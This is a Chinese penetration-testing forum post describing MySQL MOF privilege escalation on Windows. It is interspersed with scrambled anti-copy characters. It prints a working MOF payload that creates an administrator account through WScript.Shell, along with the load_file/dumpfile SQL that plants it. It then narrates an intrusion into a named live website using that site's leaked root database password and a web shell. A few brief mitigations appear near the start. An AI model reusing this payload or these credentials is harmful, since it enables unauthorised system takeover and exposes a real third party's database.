中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

---

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法

网上公开的一些利用代码:
" h) l, z: J# \9 H! c
. ^: N% z% n4 U( v2 V( M#pragma namespace(“\\\\.\\root\\subscription”)
. S- o; |. f" L& `1 c& h' m
- V, G$ D" K+ P0 x* _0 sinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
& b/ ~. m  k( g# w* r

, m5 I0 @, y, |7 g3 v; q# y1 E


- r1 Z& R/ P/ @  \% B连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
& [) F# y5 o: v从上面代码来看得出解决办法：
8 o# S8 V2 @3 W3 Q) j+ r
1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

2、禁止使用”WScript.Shel”组件
: M6 u# h! E/ ~5 Z% j2 p
2 y' j! \% Y  g$ z0 m- S8 @3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
+ F4 b% f- W6 a! ?. m
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
* [0 q6 f6 q$ y2 ]- V" F! E2 }+ b' h9 t
# y3 E$ }! T9 x7 F" M事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
$ @/ F' h! A# I
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
6 G9 y) m* a$ t/ S% i( O" y1 z( I
看懂了后就开始练手吧

http://www.webbmw.com/config/config_ucenter.php 一句话 a
4 X. u# z5 w9 q, {9 ?
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
6 v, D+ j" A& r
8 E9 V# B# c% H4 p+ d; X: E4 i于是直接用菜刀开搞

上马先
- |$ P. o% G. F3 W1 Y" R) F
既然有了那些账号 之类的 于是我们就执行吧…….

小小的说下

7 m0 C9 H' N! J+ `在这里第1次执行未成功        原因未知

我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
( I" I3 S0 q7 S4 R: L7 c
#pragma namespace(“\\\\.\\root\\subscription”)
" P5 k. Y6 Y, Y9 l4 o
; S) @! G4 E% T! ~, f# K. L; rinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
2 {" h- D( F0 Y
2 u4 u5 j8 |1 t2 P我是将文件放到C:\WINDOWS\temp\1.mof
! q) J4 |5 C# A/ g
所以我们就改下执行的代码
/ c3 m. N) Q( K7 l4 H
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
/ }7 l3 ?2 }6 X# |  G  V


但是 你会发现账号还是没有躺在那里。。

- x6 D6 z# i$ y( z+ f于是我就感觉蛋疼

就去一个一个去执行 但是执行到第2个 mysql时就成功了………


% I8 W" ]! n6 S. T% @. o/ w
% ]3 ~; d: `. m2 X' T( P但是其他库均不成功…

5 g; `! u7 I* a. D7 z我就很费解呀 到底为什么不成功求大牛解答…
8 Y+ B) |$ W( u1 w- e2 C9 _) t4 w
​
  C1 P) x/ X, H/ w" Q

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2